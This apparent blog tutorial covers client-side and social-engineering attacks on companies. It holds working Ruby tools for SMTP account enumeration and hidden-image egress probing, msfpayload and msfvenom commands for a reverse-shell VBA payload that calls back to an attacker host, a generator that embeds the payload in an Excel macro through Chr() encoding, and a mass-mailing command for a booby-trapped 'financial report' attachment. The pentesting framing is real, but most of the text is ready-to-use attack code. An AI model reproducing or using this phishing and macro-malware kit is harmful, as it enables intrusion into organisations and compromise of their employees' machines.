General Information
…“our employees are responsible and security aware”…
…“They have admin access, because we trust them”…
…“I thought it was safe to open that file. Robert from IT sent it to me”…
…etc…
Nowadays, computer networks are “usually” secure. Finding an exploitable remote network vulnerability is getting harder and harder, for several reasons: operating systems are safer, patching is slowly becoming a must for all production applications, and so on.
But what about corporate networks? Do companies secure their internal networks the way they secure production servers? The answer is NO. For a thousand reasons, workstations are never kept up to date, nor properly set up. On top of that we have the end users (IT admins included), an amazing set of people who manage amazing feats, such as infecting their computer in less than two days, installing all those crazy apps, and/or opening all those links that explicitly say DO NOT OPEN, VIRUS FOUND.
Anyway, to make a long story short: hackers, spammers, botnets and all the “bad guys” are constantly taking advantage of the ancient weakest link in every kind of security, “the human factor”. It does not matter how much you harden a computer; you can count on human ingenuity (or should I say stupidity) to find an unthinkable way to open something and compromise their workstation.
In addition, nowadays everybody wants to check their Facebook, LinkedIn, email, Twitter, GMail. Basically, it is human nature to want to be informed (…gossip). Attackers know this, and they count on people’s curiosity and need for information to craft these types of attacks.
Client-side attacks, AKA social engineering attacks or social engineering penetration tests: basically the not-so-new remote exploit trend.
It is worth noting that these types of attacks have existed for a long time, but now, with network security tightening on one hand and social networks growing rapidly on the other, they have gained a lot of strength and new variants appear daily.
Types of attacks:
- Emails
- Websites
- Social networks (Facebook, Orkut, Twitter, LinkedIn, …)
- Forums
- Physical (pendrives, CDs, phones, cellphones, iPods, iPads, etc.)
Enough of the BS talk; let’s get dirty and talk about how to actually perform a client-side attack.
Info gathering Phase ( Reconnaissance )

As in any other type of penetration test, we need to gather information. The only difference here is that instead of looking for operating system and software versions and their vulnerabilities, we look for information about the company, its employees, their social networks, and so on.
When performing a test we will probably have some limitations regarding privacy and employees’ private lives, but the truth is that a real attacker won’t have such limitations. So the simple rule is: the more information you have, the better. Everything is relevant, from sample company documents all the way down to where some employee went to dinner last week and with whom.
Luckily for us, Mark Zuckerberg (creator of Facebook) has made our lives much easier by convincing people that they are supposed to forget about privacy and share as much information as they can with as many people as they can.
The data we need depends on the type of attack we are performing, but we will almost surely need plenty of email addresses from the company being assessed. There are many tools capable of performing OSINT (Open Source Intelligence): theHarvester, Paterva’s Maltego, etc., and of course ESearchy.
ESearchy is a small Ruby library capable of searching the internet for email addresses and people. Currently the supported search engines include, but are not limited to:
- Search engines:
  - Bing
  - Yahoo
  - AltaVista
- Social engines:
  - Google Profiles
  - Naymz
  - Classmates
  - Spoke
- Other engines:
  - PGP servers
  - Usenet
  - Google Groups search
  - Spider
  - LDAP
In addition, ESearchy downloads several types of files and searches their contents for email addresses.
Supported file types include, but are not limited to:
- DOC
- DOCX
- XLSX
- PPTX
- ODT
- ODP
- ODS
- ODB
- ASN
- TXT
Installation:
$> sudo gem sources -a http://gems.github.com
$> sudo gem install gemcutter
$> sudo gem install esearchy
If you are installing it on BackTrack, follow the how-to “Installing ESearchy on Backtrack 4.0”.
The application supports several types of searches through the esearchy command, and you can also create custom scripts using the esearchy library. Using the tool is simple, for example:
$> esearchy -q @company.com --enable-gmail --enable-gpg
$> esearchy -q @company.com -c “Company Inc” --enable-people --profiling
After this we need to find the DNS servers, the mail servers and all the other information we usually gather as part of any penetration test. A good tip: check the SMTP server for information disclosure through VRFY, EXPN, etc. A server that answers those commands honestly tells us which of the harvested addresses are real accounts.
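The VRFY/EXPN check in practice, as an added example that is not part of ESearchy or of the original post. The transport is anything with #gets and #write, so the same code runs against a TCPSocket to a real mail server or, as here, against a constructed transcript (the host name mail.example.com, the account names and the reply texts are all made up for the example):

```ruby
# Added example (not ESearchy's or the original post's code): check an SMTP
# server for account enumeration through VRFY and EXPN. The transport is any
# object with #gets and #write, so the same logic runs against a TCPSocket or,
# as here, against a constructed transcript with no network at all.
require 'socket'
require 'stringio'

# Reply codes that decide the outcome (RFC 5321, section 4.2):
#   250/251  address confirmed             -> the account exists (disclosure)
#   550-553  mailbox unavailable           -> it does not exist (disclosure by difference)
#   252      "cannot verify, will accept"  -> server refuses to confirm
#   500-503  syntax error / not implemented -> command disabled
SMTP_EXISTS   = %w[250 251].freeze
SMTP_ABSENT   = %w[550 551 553].freeze
SMTP_DECLINES = %w[252 500 501 502 503].freeze

# Read one complete SMTP reply, following "250-" continuation lines, and
# return [code, text].
def smtp_reply(io)
  lines = []
  loop do
    line = io.gets or raise 'connection closed'
    lines << line.chomp
    break unless line[3] == '-'
  end
  [lines.last[0, 3], lines.map { |l| l[4..-1] || '' }.join("\n")]
end

def smtp_cmd(io, cmd)
  io.write("#{cmd}\r\n")
  smtp_reply(io)
end

def classify(code)
  return :exists   if SMTP_EXISTS.include?(code)
  return :absent   if SMTP_ABSENT.include?(code)
  return :declined if SMTP_DECLINES.include?(code)
  :other
end

# Probe each name with VRFY and EXPN. Returns
# { name => { vrfy: :exists|:absent|:declined|:other, expn: ... } }.
def smtp_enum(io, names, helo: 'probe.example')
  smtp_reply(io)                           # banner
  smtp_cmd(io, "EHLO #{helo}")
  results = names.each_with_object({}) do |n, acc|
    acc[n] = %w[VRFY EXPN].each_with_object({}) do |verb, r|
      code, = smtp_cmd(io, "#{verb} #{n}")
      r[verb.downcase.to_sym] = classify(code)
    end
  end
  smtp_cmd(io, 'QUIT')
  results
end

# True if any probe got a definitive yes/no: the server leaks which accounts
# exist, which is exactly what we need to confirm harvested addresses.
def smtp_discloses?(results)
  results.values.any? { |r| r.values.any? { |v| %i[exists absent].include?(v) } }
end

# Constructed transcript standing in for a real server (not captured data):
# VRFY enabled and leaking, EXPN disabled.
class FakeSMTP
  attr_reader :sent
  def initialize
    @sent = []
    @buf = StringIO.new([
      "220 mail.example.com ESMTP\r\n",
      "250-mail.example.com\r\n250 PIPELINING\r\n",   # EHLO
      "250 2.1.5 jsmith <jsmith@example.com>\r\n",   # VRFY jsmith
      "502 5.5.1 EXPN not implemented\r\n",          # EXPN jsmith
      "550 5.1.1 nobody... User unknown\r\n",        # VRFY nobody
      "502 5.5.1 EXPN not implemented\r\n",          # EXPN nobody
      "221 Bye\r\n",
    ].join)
  end
  def write(s); @sent << s; end
  def gets; @buf.gets; end
end

if __FILE__ == $0
  # Live use: smtp_enum(TCPSocket.new('mail.company.com', 25), names)
  res = smtp_enum(FakeSMTP.new, %w[jsmith nobody])
  res.each { |n, r| puts "#{n}: VRFY=#{r[:vrfy]} EXPN=#{r[:expn]}" }
  puts(smtp_discloses?(res) ? 'server discloses account existence' : 'no disclosure')
end
```

A 252 on every name is the well-configured case (the server accepts mail but refuses to confirm accounts); a mix of 250 and 550 is the disclosure the tip above is about, and in that case the whole ESearchy output can be validated against the server before sending a single email.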
Software and Physical network
Once we have a target list (emails, names, etc.), we need to start assessing the network from within. One way to do this is to send one or more rounds of emails built from specially crafted HTML templates containing several image tags pointing at different ports on a server we control. This is where a tool such as EMaily comes in.
EMaily is a command line tool created to send multiple templated emails through several servers at the same time. It ships with many templates, but users can create their own and populate them as needed. It is worth noting that EMaily is also an extensible Ruby library.
<img src="http://site:80/80.jpg?e=test@test.com" style="display:none" />
<img src="http://site:8080/8080.jpg?e=test@test.com" style="display:none" />
<img src="http://site:443/443.jpg?e=test@test.com" style="display:none" />
<img src="http://site:1080/1080.jpg?e=test@test.com" style="display:none" />
<img src="http://site:139/139.jpg?e=test@test.com" style="display:none" />
<img src="http://site:445/445.jpg?e=test@test.com" style="display:none" />
EMaily’s template system generates this block automatically from the %%payload[port 1, ... ,port n]%% placeholder.
When the mail client renders the message it requests every image, and each request that reaches our web server is logged. The port tells us which outbound connections the corporate egress rules allow, the source IP tells us the public address (or proxy) the workstation goes out through, and the User-Agent identifies the operating system and email client. Keep in mind that most mail clients block remote images by default, so a port that never calls back may just mean the user did not allow images, not that the port is filtered.
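The two halves of that trick in code, as an added example that is neither EMaily’s own code nor from the original post: expanding a port list into the hidden images, and reading the hits back out of a web server log to see what each recipient could reach. The host name, ports and the four log lines are constructed for the example; the only format assumed is the usual combined log format that Apache and most small HTTP servers write.

```ruby
# Added example (not EMaily's own code): expand a port list into the hidden
# image tags the %%payload[...]%% placeholder stands for, then read the
# resulting web-server hits to see which ports each recipient could reach.
# The log lines are constructed for the example; real ones come from whatever
# serves the images (EMaily's --webserver or a plain Apache).
require 'cgi'
require 'set'

# One hidden <img> per port. The recipient goes in the query string so each
# hit can be attributed; escaping keeps '@' and '+' from breaking the URL.
def tracking_images(host, ports, email)
  e = CGI.escape(email)
  ports.map { |p| %(<img src="http://#{host}:#{p}/#{p}.jpg?e=#{e}" style="display:none" />) }
end

# Combined-log-format line: ip ident user [time] "GET path HTTP/x" status bytes "ref" "agent"
LOG_RE = /\A(\S+) \S+ \S+ \[[^\]]*\] "GET (\S+) [^"]*" \d+ \S+ "[^"]*" "([^"]*)"/

# Returns {ip:, port:, email:, ua:} for a tracking hit, nil for anything else.
def parse_hit(line)
  m = LOG_RE.match(line) or return nil
  ip, path, ua = m.captures
  port  = path[%r{\A/(\d+)\.jpg}, 1] or return nil
  email = path[/\?e=([^&\s]+)/, 1]   or return nil
  { ip: ip, port: port.to_i, email: CGI.unescape(email), ua: ua }
end

# Per recipient: ports that called back, ports that did not, source IPs and
# user agents. A port with no hit is reported as :no_hit rather than
# "filtered": most mail clients suppress remote images until the user allows
# them, so silence proves nothing about the firewall.
def egress_summary(log_lines, ports)
  acc = Hash.new { |h, k| h[k] = { reached: Set.new, ips: Set.new, agents: Set.new } }
  log_lines.each do |l|
    h = parse_hit(l) or next
    r = acc[h[:email]]
    r[:reached] << h[:port]
    r[:ips]     << h[:ip]
    r[:agents]  << h[:ua]
  end
  acc.each_with_object({}) do |(email, r), out|
    out[email] = { reached: r[:reached].sort, no_hit: (ports - r[:reached].to_a).sort,
                   ips: r[:ips].to_a, agents: r[:agents].to_a }
  end
end

PORTS = [80, 443, 8080, 445]
SAMPLE_LOG = [ # constructed, not captured
  '203.0.113.7 - - [10/Oct/2010:13:55:36 -0300] "GET /80.jpg?e=alice%40company.com HTTP/1.1" 200 43 "-" "Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.4760; Pro)"',
  '203.0.113.7 - - [10/Oct/2010:13:55:36 -0300] "GET /443.jpg?e=alice%40company.com HTTP/1.1" 200 43 "-" "Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.4760; Pro)"',
  '198.51.100.9 - - [10/Oct/2010:14:02:11 -0300] "GET /80.jpg?e=bob%40company.com HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Thunderbird/3.1.2"',
  '198.51.100.9 - - [10/Oct/2010:14:02:12 -0300] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __FILE__ == $0
  puts tracking_images('site', PORTS, 'test@test.com')
  egress_summary(SAMPLE_LOG, PORTS).each do |email, r|
    puts "#{email}: reached #{r[:reached]} no hit #{r[:no_hit]} from #{r[:ips]} via #{r[:agents]}"
  end
end
```

Two hits from the same source IP on 80 and 443 but nothing on 8080 or 445 is the usual corporate picture (web ports allowed, SMB blocked at the edge); the User-Agent strings are what later decide whether an Office or a PDF attachment makes more sense.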
Penetration Phase
Once we have enough information about the company’s users and network infrastructure, it is time to concentrate all our efforts on attacking the company using every possible method. There are many ways to compromise an end user. The most common is sending emails with attachments such as PDF, Word, Excel, PowerPoint or executable files. Pretty much anything is possible and allowed.
VBA Attacks
One of the most common methods for compromising a workstation is a VBA payload: a Word, Excel or PowerPoint file containing a malicious macro that generates and executes, most commonly, a reverse shell (Metasploit, Core Impact, custom built).
It is worth noting that when generating the payload we should use the open-port information from the information gathering phase, so we can be sure the victim can connect back to our MSF instance.
Sample Metasploit command to generate a reverse TCP VNC inject payload in VBA format (the V output). msfpayload has since been removed from Metasploit; the msfvenom equivalent is -p windows/vncinject/reverse_tcp LHOST=192.168.1.1 -f vba-exe, which produces the same two-part output of macro plus appended data.
> msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.1 V > vbvnc.bas
Once we have the payload we need to add it to a document. This is where experience and artistic skills come in handy: the more credible the file, the higher the chance an employee opens it. It is usually recommended to search Google, Bing and Yahoo for documents made by or related to the company in question. These documents contain logos, speeches and other corporate standards that make the attack more credible.
First open the document in question and open the Visual Basic editor for macros.
Then copy the first part of the .bas script (the macro) into the editor, save it and close the editor.
The second part, the actual payload, goes at the end of the document body if we are using a MS Word document.
It is worth noting that the latest version of the MSF VBA attack (3.4.x) only works as-is with Microsoft Word, but with a couple of changes it can be used in Excel as well: instead of storing the payload as paragraphs of the document, paste it into the macro itself, either as a stream (as used to be done) or by rebuilding it with the Chr() method.
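What “the Chr() method” amounts to, as an added example that is not Metasploit’s VBA output and not from the original post: a small Ruby generator that turns a byte string into VBA statements rebuilding it with Chr(), so the payload can live inside the Excel macro instead of as text at the end of a Word document, plus the inverse parse to verify the result before sending. The bytes used are constructed filler, the function and variable names are made up, and the caveat about code pages is the reason msfvenom emits a Byte array rather than a string.

```ruby
# Added example (not Metasploit's VBA output and not from the post): encode a
# byte string as VBA statements that rebuild it with Chr(), the "chr() method"
# for keeping the payload inside the macro instead of as text at the end of
# the document. The bytes used here are constructed filler, not a payload.

# VBA rejects physical lines longer than 1023 characters and caps the number
# of "_" continuations per statement, so each line is a complete, short
# assignment and no continuations are used.
def vba_chr_lines(bytes, var: 'buf', per_line: 40)
  bytes.bytes.each_slice(per_line).map do |chunk|
    "#{var} = #{var} & " + chunk.map { |b| "Chr(#{b})" }.join(' & ')
  end
end

# Wrap the lines in a VBA function returning the rebuilt string. Only the
# builder is sketched here; what the macro does with the bytes afterwards is
# the loader's business and is not shown.
def vba_builder(bytes, func: 'BuildPayload', var: 'buf', per_line: 40)
  body = vba_chr_lines(bytes, var: var, per_line: per_line).map { |l| "    #{l}" }
  ["Private Function #{func}() As String",
   "    Dim #{var} As String",
   *body,
   "    #{func} = #{var}",
   "End Function"].join("\r\n")
end

# Inverse: pull the bytes back out of generated VBA. Use it to verify the
# macro before sending; it is also the parse a defender's scanner would do.
def bytes_from_vba(vba)
  vba.scan(/Chr\((\d+)\)/).flatten.map(&:to_i).pack('C*')
end

# Caveat: Chr(n) for n >= 128 goes through the system code page, and a few
# values are undefined in some code pages (0x81, 0x8D, 0x8F, 0x90 and 0x9D in
# Windows-1252), so the round trip can corrupt those bytes on the victim.
# msfvenom's own -f vba output avoids this by emitting a Byte array instead.
def code_page_risky_bytes(bytes)
  bytes.bytes.uniq.select { |b| [0x81, 0x8D, 0x8F, 0x90, 0x9D].include?(b) }.sort
end

FILLER = "MZ\x90\x00\x03\x00".b + (0..255).to_a.pack('C*')   # constructed filler

if __FILE__ == $0
  vba = vba_builder(FILLER)
  puts vba.lines.first(4)
  puts "round trip ok: #{bytes_from_vba(vba) == FILLER}"
  puts "code-page-sensitive bytes: #{code_page_risky_bytes(FILLER).map { |b| '%02X' % b }}"
end
```

Run the generator over the real payload bytes from the .bas file, paste the emitted function into the workbook’s macro, and call it from Auto_Open (or Workbook_Open) in place of reading paragraphs from the document; if code_page_risky_bytes reports anything, switch to the Byte array form.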
Once we have the Excel file set up, it is time to take all the emails we collected and launch our first round of client-side attacks, using EMaily again but this time with another template, such as an internal email or something that would convince users to open the attached Excel sheet (I leave that for later…).
For example, to send emails through servers 1, 2, 3 and 4 in blocks of 100 emails, all at the same time (threaded), with a small port scan that tells us who opened the email, we would run the following command:
> emaily -S server1,server2,server3,server4 -b 100 -T --subject "Quarterly Report" -t templates/q_report.html -l ~/company_emails.csv -a ~/tmp/Q4_Financial_Report.xls --webserver --scanports 80,443
Well, now it is time to lay back, get some mate with alfajores and wait until users start executing the Excel payload and we get a connection back. After that the sky is the limit…. HACK the entire company….
Happy Hacking !!!!